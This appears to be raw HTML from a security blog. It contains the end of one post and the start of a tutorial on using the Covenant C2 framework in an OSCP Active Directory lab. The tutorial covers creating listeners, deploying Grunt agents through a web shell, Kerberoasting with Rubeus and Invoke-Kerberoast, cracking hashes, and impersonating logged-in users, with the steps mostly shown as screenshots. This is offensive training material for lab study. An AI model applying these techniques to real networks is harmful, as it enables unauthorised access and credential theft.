1em;"><img border="0" data-original-height="771" data-original-width="983" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6-hC8LV189RlvgmgfKI7uBsLUyCR3dqDg8yTbycsvURoM7pOaGoWNL9maOTyfq1pTCLaleMIkH8HBibBLNWII3opL2vbNrjH9uTMl-gM8ppSy5ts0sWvKP-Y47PGCFT2DwciKBkXM50GDTCqOcekcDCVSjoef0Elj91bL7TfWIVeY_9p6H1ldIu4/s16000/im12.png" /></a></div><br />Execute command to launch Grunt on target machine using <span style="color: white;">PowerShellRemotingGrunt</span> and connect to it by using connect command:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrcc-e-19LPdehttx6d72HgQ99mrQz_C_NbtqAiE7Nq-ukUiOv5-Bhxk4tPeZm2iydxvv8SOIjxqe_ufI0p-pEpLj3sagdyVXU4qCZ1oO_V8FMiT6KUe6Dowv9Cxryn3_znrT5sGzvuD7wcPP3UzrjfLevt-RF2AcdIFFNuGmRYmy-PgwE4kzp5YnO/s993/im13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="643" data-original-width="993" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrcc-e-19LPdehttx6d72HgQ99mrQz_C_NbtqAiE7Nq-ukUiOv5-Bhxk4tPeZm2iydxvv8SOIjxqe_ufI0p-pEpLj3sagdyVXU4qCZ1oO_V8FMiT6KUe6Dowv9Cxryn3_znrT5sGzvuD7wcPP3UzrjfLevt-RF2AcdIFFNuGmRYmy-PgwE4kzp5YnO/s16000/im13.png" /></a></div><p></p><div><p>Thanks for reading.</p><p><br />Special thanks to: - Burcu YARAR, <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, vivek chauhan, Manoj and <a href="https://twitter.com/5h4d0w_hun73r">Karan</a><br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div><span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
<div><div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil,
google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India,
Magnum sniper, </code></div><div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, </code></div><div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;"><code class="text plain">#Golden boy INDIA, Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji,Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
</div><br /><br /><p><br /><br /><br /><br /></p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-87354777147106409112022-07-02T22:17:00.023+05:302023-11-22T11:26:01.673+05:30Covenant C2 for OSCP AD lab - Part 1<p> Hello all,<span></span></p><a name='more'></a>In this blog post, I am going demonstrate a few of the features of Covenant C2 framework.<p></p><p>Please follow the instructions to install Covenant C2 from official Github repository <br /></p><p><span style="color: #2b00fe;"><a href="https://github.com/cobbr/Covenant/wiki/Installation-And-Startup">https://github.com/cobbr/Covenant/wiki/Installation-And-Startup</a></span></p><h3 style="text-align: left;"><span style="color: white;">Listener: -<br /></span></h3><div style="text-align: left;">Listener is something which will allow a Covenant agent talk to Covenant server. </div><div style="text-align: left;">To create a listener, following options will need to be configured:</div><div style="text-align: left;"> </div><div style="text-align: left;">Source - Covenant wiki page</div><div style="text-align: left;"> </div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVgHw1I7RoVMMV8hHbwXABrKPbyGhdR16T6ft_x2dheNMrauqNbfHMutksy53ntJ9xDx7kUJ2ylyZ4bWRYJLFOi4uocaLOIAu-LJVHVLi_DhDTGklbLSEn5dsAlZrDqA2IaIjXaA5Y0gPrzWGT86zPzBFI3X7gka6Jo8pueJM5s2G7RGwzXKzJhW1S/s1272/list2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="703" data-original-width="1272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVgHw1I7RoVMMV8hHbwXABrKPbyGhdR16T6ft_x2dheNMrauqNbfHMutksy53ntJ9xDx7kUJ2ylyZ4bWRYJLFOi4uocaLOIAu-LJVHVLi_DhDTGklbLSEn5dsAlZrDqA2IaIjXaA5Y0gPrzWGT86zPzBFI3X7gka6Jo8pueJM5s2G7RGwzXKzJhW1S/s16000/list2.png" /></a></div><br />In my case, I configured Covenant like this and name of the lintener is <span style="color: white;">http</span>:</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPYnVTMWFuPoLyF-rkhPy8VkNYVMPaoRID0gZc1VyuvvDc-_krOkkF9ep0TrLPGx6BjIBdJrEGHTd6e1RhyJdSTbCZdQlkFGhGpacpAED5NPR1KETZeQ4HNoZuh-ZUnu0tK6KaO1oS3_wVGzOJ4FnACM26GG4iB2-EeY-S3_k8jXr8ivizgN4dTHT/s1337/list.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="936" data-original-width="1337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPYnVTMWFuPoLyF-rkhPy8VkNYVMPaoRID0gZc1VyuvvDc-_krOkkF9ep0TrLPGx6BjIBdJrEGHTd6e1RhyJdSTbCZdQlkFGhGpacpAED5NPR1KETZeQ4HNoZuh-ZUnu0tK6KaO1oS3_wVGzOJ4FnACM26GG4iB2-EeY-S3_k8jXr8ivizgN4dTHT/s16000/list.png" /></a></div><div style="text-align: left;"><span style="color: white;"><span style="color: black;"> </span></span></div><h3 style="text-align: left;"><span style="color: white;">Grunt: -<br /></span></h3><div style="text-align: left;">Grunt is an agent which takes command from Covenant framework and execute it on target machine. </div><div style="text-align: left;">It can be a binary file or PowerShell/VB/JS based code.</div><div style="text-align: left;"> </div><div style="text-align: left;">To generate a Grunt, we need to go to <b><span style="color: white;">Launcher</span></b> section:</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgabo2ghCiGvl1r1UIGChoexkZbTLCgOlzfL2R6J5H51taGRQyDfpe_4tGNEsw-sjN-6Pnx_MtphQsMTliIpzFWoQk_dz08ToWGLmJuaa1piTJoX7qKon1HoK1EMMMVQzxNOrc5LmAS2lP87bXJidz5nIS--WflJOWLnImXqnCaxZ3ahr8VJ_k1WITy/s1110/launch.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="601" data-original-width="1110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgabo2ghCiGvl1r1UIGChoexkZbTLCgOlzfL2R6J5H51taGRQyDfpe_4tGNEsw-sjN-6Pnx_MtphQsMTliIpzFWoQk_dz08ToWGLmJuaa1piTJoX7qKon1HoK1EMMMVQzxNOrc5LmAS2lP87bXJidz5nIS--WflJOWLnImXqnCaxZ3ahr8VJ_k1WITy/s16000/launch.png" /></a></div><br /><div style="text-align: left;">In my case, I will be using Binary based or PowerShell code based grunts.</div><div style="text-align: left;"> </div><div style="text-align: left;">Let's take example of Binary based Grunt. </div><div style="text-align: left;"> </div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb47NpVxunfpnbtI_hOimv6btDh8cheLtaUdh3uIoiGOz45yqBU7AZ3kLV5lDEpMtQsFhKmPCx4BjEjdLoQRDr3_mtxipIHdfJplf7lbWSN36NKVytsuCK4mYhkNoFbpmcGN8Eg47w37vVdPUIOCLUXrCG5j3HN7AdNrBkWSJyqHGaMxPKB859mcaY/s1089/grunt1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1089" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb47NpVxunfpnbtI_hOimv6btDh8cheLtaUdh3uIoiGOz45yqBU7AZ3kLV5lDEpMtQsFhKmPCx4BjEjdLoQRDr3_mtxipIHdfJplf7lbWSN36NKVytsuCK4mYhkNoFbpmcGN8Eg47w37vVdPUIOCLUXrCG5j3HN7AdNrBkWSJyqHGaMxPKB859mcaY/s16000/grunt1.png" /></a></div></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"><br />Upload this binary to target machine and execute it. </div><div style="text-align: left;">For example, in case of a vulnerable web application, exploit vulnerability which allows us to gain web shell access, upload it and execute it using web shell.</div><div style="text-align: left;"> </div><div style="text-align: left;">Here is the PowerShell code based Grunt, for which we need to select newly created HTTP based Listener + specify other parameters and click Generate button to generate the PowerShell code which we need to execute on target machine/server using any trick (again, lets say vulnerable web app allowed us to gain web shell access and we can execute this PowerShell based payload on server using that web shell)</div><div style="text-align: left;"> </div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbM_AFf2gxmQGyQiRAKZ_gcF2NdiIZPKxrRWpCsaB-5AldHf4b_QgLPiQoydU4_D9etMJt5WiO2ml_G1hJ-l1PfWWVbVf0wx4V9J9gNe58zwCaTIwtpCRodR6bD_EJ6zKjuPPBMxzZZgi2rLLS916zd25xUS1wt4gGDdfpKqucofJydtlboGJmrCa/s1643/grunt2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="781" data-original-width="1643" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEbM_AFf2gxmQGyQiRAKZ_gcF2NdiIZPKxrRWpCsaB-5AldHf4b_QgLPiQoydU4_D9etMJt5WiO2ml_G1hJ-l1PfWWVbVf0wx4V9J9gNe58zwCaTIwtpCRodR6bD_EJ6zKjuPPBMxzZZgi2rLLS916zd25xUS1wt4gGDdfpKqucofJydtlboGJmrCa/s16000/grunt2.png" /></a></div> <span style="color: #f3f3f3;"><u><span style="font-size: large;"> </span></u></span></div><div style="text-align: left;"><span style="color: #f3f3f3;"><u><span style="font-size: large;">Basics of Grunt </span></u></span><br /></div><p>First of all, create an HTTP launcher which will be used by Covenant agent to communicate to Covenant framework.</p><p>Once Grunt payload will be executed on the target, session will be created which can be accessed just by clicking it:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwbYFb_3DC3pfqZ2MtsZcIg_2kFRd5EnUQVdmwQkPJQRICOaRr5lGiNu4KgAnMxP6ISDcX4ytdoqbsy03rkUSRgGWbfEHd3OYom6JysxuHonCvsgnKs3LIFMPOtFkRfQrFqklx09VSwQAxLYjZDyqR7xad-TvbCkj9h31j19Tnx7QPIb74SiSts7e/s1433/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1433" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwbYFb_3DC3pfqZ2MtsZcIg_2kFRd5EnUQVdmwQkPJQRICOaRr5lGiNu4KgAnMxP6ISDcX4ytdoqbsy03rkUSRgGWbfEHd3OYom6JysxuHonCvsgnKs3LIFMPOtFkRfQrFqklx09VSwQAxLYjZDyqR7xad-TvbCkj9h31j19Tnx7QPIb74SiSts7e/s16000/4.png" /></a></div><p></p><p>Grunt's info tab shows the basic info regarding the Grunt agent and the target machine:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqmMvPiOBhxEyOfeoNbZVboSKX_MNu1ppYaV7YBBa3DiN9w-vhssQJPPxKeEoqjB7BHe2I6cJq_0kX2AtohuoY4JZT_mlmdTHwojJM3ZMDN4TslJc6ngIdtkTj3Kw_ZTqJyzmbTvcBrq4PbQB8kf6M3U-eWqHfwlDhOij9_DdmxzAK5WKmQdbXIMw/s1223/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="769" data-original-width="1223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqmMvPiOBhxEyOfeoNbZVboSKX_MNu1ppYaV7YBBa3DiN9w-vhssQJPPxKeEoqjB7BHe2I6cJq_0kX2AtohuoY4JZT_mlmdTHwojJM3ZMDN4TslJc6ngIdtkTj3Kw_ZTqJyzmbTvcBrq4PbQB8kf6M3U-eWqHfwlDhOij9_DdmxzAK5WKmQdbXIMw/s16000/5.png" /></a></div><p>To execute commands on target machine, either use <span style="color: white;"><b>Interact</b></span> tab (CLI interface) or go for <b><span style="color: white;">Task</span></b> tab. </p><p><span style="color: white;"><span style="font-size: large;">Interact Tab: - </span></span></p><p>This is the CLI interface of covenant which will used by Covenant to show commands executed by user and their output.<span style="color: white;"></span></p><p style="text-align: center;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUc0WvN0aR7_rN65TQJI87jVD4bwn1pLjPi8FofIezzsuomOu-EdhpEw2Kr6D2xJWIdbspNkVRnWSaUjhTeQf1sRhLYT-5xmlH5JHPgyP3PdB3MaMccwDXqYr7QQCDjrXzgTxvVTxCF7RNga-4KzJQUWT55Vy12NuchRep4PSFhmJBCc7dBw6xBpwW/s1213/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="806" data-original-width="1213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUc0WvN0aR7_rN65TQJI87jVD4bwn1pLjPi8FofIezzsuomOu-EdhpEw2Kr6D2xJWIdbspNkVRnWSaUjhTeQf1sRhLYT-5xmlH5JHPgyP3PdB3MaMccwDXqYr7QQCDjrXzgTxvVTxCF7RNga-4KzJQUWT55Vy12NuchRep4PSFhmJBCc7dBw6xBpwW/s16000/7.png" /></a></div><b><br /></b><div><p></p><p><span style="font-size: large;"><span style="color: white;">Task Tab: - </span></span></p><p>Task tab is actually GUI to select a task which will be executed by the Covenant and this interface allows a user to specify the parameters to the selected task:<span style="font-size: large;"><span style="color: white;"></span></span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ0-kTSo34XnZOwquDDZ-5msEPCUBwsq3c88UMREWSU7vQ1ikyE0mjt4CRtiGuqRanjF2rNRKzgDQ2G2FLkPIt_J7THHbEh89T-D1nqZ_cLXnPg22wJ1XHKukfvDgZwE6w1aSUTqUVnmroY9dQ4lHw_yLexNJ-qSnXg_9mQ_RDUdcf94TgQhn85kKH/s864/9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="797" data-original-width="864" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ0-kTSo34XnZOwquDDZ-5msEPCUBwsq3c88UMREWSU7vQ1ikyE0mjt4CRtiGuqRanjF2rNRKzgDQ2G2FLkPIt_J7THHbEh89T-D1nqZ_cLXnPg22wJ1XHKukfvDgZwE6w1aSUTqUVnmroY9dQ4lHw_yLexNJ-qSnXg_9mQ_RDUdcf94TgQhn85kKH/s16000/9.png" /></a></div><b> </b></div><div><br /><p></p><p><span style="font-size: large;"><span style="color: white;">OS command execution:</span></span></p><p>Let's go for 'Task' tab because it is self-explainatory and begineer-friendly. <br /></p><p>For OS command execution, use <span style="color: white;"><b>shell</b></span> or <b><span style="color: white;">shellcmd</span></b> task module:</p><p><b></b></p><div class="separator" style="clear: both; text-align: center;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05OaQMjxNrQ-sP_o1SoxvHo-CpjbTLxiUfdcnnzp_Pg2ZobKf0tKDkbEtJry8nARs77kQDD2votCeNiVMoZhXkIeqj6d5qz1KSCuvGiY3dbLB8B8LVQBoGcG8ZSzQ1M9u0D4sse4BoVco6KR1zqklyaAPADFzXF3xhgQ0-KMQTy_N9_8G-T8Ykd0K/s653/10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="430" data-original-width="653" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05OaQMjxNrQ-sP_o1SoxvHo-CpjbTLxiUfdcnnzp_Pg2ZobKf0tKDkbEtJry8nARs77kQDD2votCeNiVMoZhXkIeqj6d5qz1KSCuvGiY3dbLB8B8LVQBoGcG8ZSzQ1M9u0D4sse4BoVco6KR1zqklyaAPADFzXF3xhgQ0-KMQTy_N9_8G-T8Ykd0K/s16000/10.png" /></a></b></div><p></p><p>After clicking <span style="color: white;"><b>Task</b></span> button, We will be dropped to the <span style="color: white;"><b>Interact </b></span>tab automatically where output of the task will be displayed:<br /><b> </b> <br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHlZCy0TuknCHKEhfENjiXBvcj9Uzr6AtOHr5VoVir6f1rZHwSJZy4vQsD6KFv0s0m7SSM5PN9sVhxs0DRYjM5Hh5bgUj9TWVIJRsHwPi9ZI6mRvMUdgdUkuzm9d8_Z4peIxpBkKooSoq-iL_EdFhW_rXoE5w08h92t4rgFILDi1Rq4wVaofHmoYVd/s814/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="814" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHlZCy0TuknCHKEhfENjiXBvcj9Uzr6AtOHr5VoVir6f1rZHwSJZy4vQsD6KFv0s0m7SSM5PN9sVhxs0DRYjM5Hh5bgUj9TWVIJRsHwPi9ZI6mRvMUdgdUkuzm9d8_Z4peIxpBkKooSoq-iL_EdFhW_rXoE5w08h92t4rgFILDi1Rq4wVaofHmoYVd/s16000/11.png" /></a></div><p></p><p>We can execute other OS commands using this task module.</p><h1 style="text-align: left;"><span style="font-size: x-large;"><span style="color: #ffa400;"><span style="font-weight: normal;"><u>AD environment related attacks:</u></span></span></span></h1><p>Let's go for the AD environment based attacks such as,</p><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">1. Kerberoasting</span></span></span></span></h3><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">2. Impersonating logged-in user</span></span></span></span></h3><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">3. Dumping NTLM/Plaintext password of logged-in/local user account</span></span></span></span></h3><p><br /></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. Kerberoasting</span></span></span></h3><p>It can be performed using in-built <b><span style="color: white;">Task</span></b> or we can go for PowerShell based scripts. Covenant has 2 in-built Task which are <b><span style="color: white;">Kerberoast</span></b> and <span style="color: white;"><b>Rubeus</b></span>.</p><p><b><span style="color: white;">Rubeus </span></b>is my first choice because of the fact that in <b><span style="color: white;">Kerberoast </span></b>Task, we need to specify the name of the SPN for which we want to perform Kerberoasting whereas in case of <b><span style="color: white;">Rubeus</span></b>, we need not to do so.</p><p>So let's start with <b><span style="color: white;">Rubeus</span></b>. Just select <b><span style="color: white;">Rubeus </span></b>and make sure <span style="color: white;">kerberoast</span> is mentioned in the command input field:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNtmTU6j1IDNwMca_r8aRtiIbSXoc1-bJFYoYNYVfQkP00vveWJgFXhMqhpYjtdQ9XQ6DxlzibR1CavuT-WCs7dbY9ivIhjefdRk_5Qk8BmcglSWlSL0L4gzWSmHnuBQkjf9icpFzHeewNhtB8z0x2iIXFryRqyjD7tlM1XdisaEiy5kxwgLkVY2uZ/s621/30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="621" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNtmTU6j1IDNwMca_r8aRtiIbSXoc1-bJFYoYNYVfQkP00vveWJgFXhMqhpYjtdQ9XQ6DxlzibR1CavuT-WCs7dbY9ivIhjefdRk_5Qk8BmcglSWlSL0L4gzWSmHnuBQkjf9icpFzHeewNhtB8z0x2iIXFryRqyjD7tlM1XdisaEiy5kxwgLkVY2uZ/s16000/30.png" /></a></div><br /> Click <span style="color: white;">Task </span>button and wait for the output:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSS5jlkPIoikTJJBRxye4fJjSN--AgZl5GQpjK3jqQEG3kYJWlipa_euzY8k_utseQk7-fhWr5Zk05UaJOYGb3zsYzv7NQRWKUytoQniE6a0vONX_OwmNyvomvTON9DFn3Lyz5Kodjyghu8bo3Wo_gilk6fZ29sAAxy9G1DwwC7mCUQVaM1ga1DfuD/s850/31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="850" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSS5jlkPIoikTJJBRxye4fJjSN--AgZl5GQpjK3jqQEG3kYJWlipa_euzY8k_utseQk7-fhWr5Zk05UaJOYGb3zsYzv7NQRWKUytoQniE6a0vONX_OwmNyvomvTON9DFn3Lyz5Kodjyghu8bo3Wo_gilk6fZ29sAAxy9G1DwwC7mCUQVaM1ga1DfuD/s16000/31.png" /></a></div><p>There we go!!!!</p><p>Let's try with PowerShell script. </p><p>I personally like to go for PowerShell script based kerberoasting. We have very awesome script in PowerShell Empire framework which is developed by Harmjoy bhai ji <br />Link: </p><p><a href="https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1">https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1</a></p><p>Download the script, and in <span style="color: white;">Task </span>tab, select Task type <b><span style="color: white;">PowerShellImport</span></b> and browse the kerberoasting PowerShell script. By clicking <span style="color: white;">Task</span> button, script will be imported to the Covenant and we can use it using <b><span style="color: white;">PowerShell </span></b>'Task':</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcTr7QXO5ur4UIlh4eP_9VW2YtuE6mNtNNrgiFBpIaGkQT7IT9icRir7oRDG7zdlCazCCBEEAUa8noHYGS-lj4hCSFq09-M3m7xe0vrNMEMFVcoHh757j7lDYBaJ1l_hWrlJn_ChwY6fx-IiFhbO5d0FrXoy2KobtGIqd9wW6lyqmQtvfxotS9ZeeY/s549/32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="354" data-original-width="549" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcTr7QXO5ur4UIlh4eP_9VW2YtuE6mNtNNrgiFBpIaGkQT7IT9icRir7oRDG7zdlCazCCBEEAUa8noHYGS-lj4hCSFq09-M3m7xe0vrNMEMFVcoHh757j7lDYBaJ1l_hWrlJn_ChwY6fx-IiFhbO5d0FrXoy2KobtGIqd9wW6lyqmQtvfxotS9ZeeY/s16000/32.png" /></a></div><p></p><p>Now, in <b><span style="color: white;">Interact</span></b> tab, execute below mentioned command to perform kerberoasting against every SPN registered in the domain:</p><textarea style="height: 28px; margin: 0px; width: 250px;">PowerShell Invoke-Kerberoast </textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxIaWd2F6vqVGs8fd4nxZjW0N2rMiIUx31YUmDpqEueG_3rO8Wff-qrcsY8hhqEz4pf_ndSnduiOOvKymQrd7MG4iMjLDG4oD6uegurG5CglGcFLDoBx-SNi1j2KWHqHhno4_7aFAe-hdNCM2_rr8nfanpjdnMKuV_WLgrUCcWa0cn59TSqQ5RDYG/s594/33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="594" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxIaWd2F6vqVGs8fd4nxZjW0N2rMiIUx31YUmDpqEueG_3rO8Wff-qrcsY8hhqEz4pf_ndSnduiOOvKymQrd7MG4iMjLDG4oD6uegurG5CglGcFLDoBx-SNi1j2KWHqHhno4_7aFAe-hdNCM2_rr8nfanpjdnMKuV_WLgrUCcWa0cn59TSqQ5RDYG/s16000/33.png" /></a></div><p></p><p>After successful attempt, we will get the output something like this:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhcL7C1C_tTBcruXm04gW5VbUb6xHb0zzmSXGovtIipZEuqmp8dWNb1r0WTlEJ6k3fENQ3o6uTQfgxZV2bsbpScN1u1g30Zmh7GCivD5jDOKYbZKOJMrlLEQK-pXsdNCce4vcSMZAqM65ikbRIga85DNZxZHzthkBpCQdoyihWo7b3SI2_yV_YYQW/s691/34.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="436" data-original-width="691" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhcL7C1C_tTBcruXm04gW5VbUb6xHb0zzmSXGovtIipZEuqmp8dWNb1r0WTlEJ6k3fENQ3o6uTQfgxZV2bsbpScN1u1g30Zmh7GCivD5jDOKYbZKOJMrlLEQK-pXsdNCce4vcSMZAqM65ikbRIga85DNZxZHzthkBpCQdoyihWo7b3SI2_yV_YYQW/s16000/34.png" /></a></div><p></p><p>Now, try to crack it using hashcat or any other tool of your choice.</p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">2. Impersonating logged-in user</span></span></span></h3><p></p><p>This technique is all about impersonating a Domain user which is logged-in to the machine in which we have local admin privilege. We can impersonate any user logged-in to the machine.</p><p>To make most of an impersonated user session, it is always recommanded to launch a new Grunt once user account has been impersonated.</p><p>To impersonate a user session, first of all we need to find the list of logged-in user whch can be done using <span style="color: white;">Task </span><b><span style="color: white;">GetNetLoggedOnUser</span></b>. Specify the hostname of the machine for which we have Grunt session:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4Sr4YPsVixv_TGyEyJ1hugKXpwPuJj0WVfxsILvRYHeRwwqSxLtwowX4rX7Upz5nPaAJS8R_Iy3dq2lWuyAE4zvBgOIMuFFAtGjDMLrvQ_Pkl7WwJGXhHAlNI8eP_WuS-21YEOC932QEWCi4EvVNVYgDAHEk48C8oQjwxIgyaINugbaCNmgNo5YA/s491/35.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="440" data-original-width="491" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4Sr4YPsVixv_TGyEyJ1hugKXpwPuJj0WVfxsILvRYHeRwwqSxLtwowX4rX7Upz5nPaAJS8R_Iy3dq2lWuyAE4zvBgOIMuFFAtGjDMLrvQ_Pkl7WwJGXhHAlNI8eP_WuS-21YEOC932QEWCi4EvVNVYgDAHEk48C8oQjwxIgyaINugbaCNmgNo5YA/s16000/35.png" 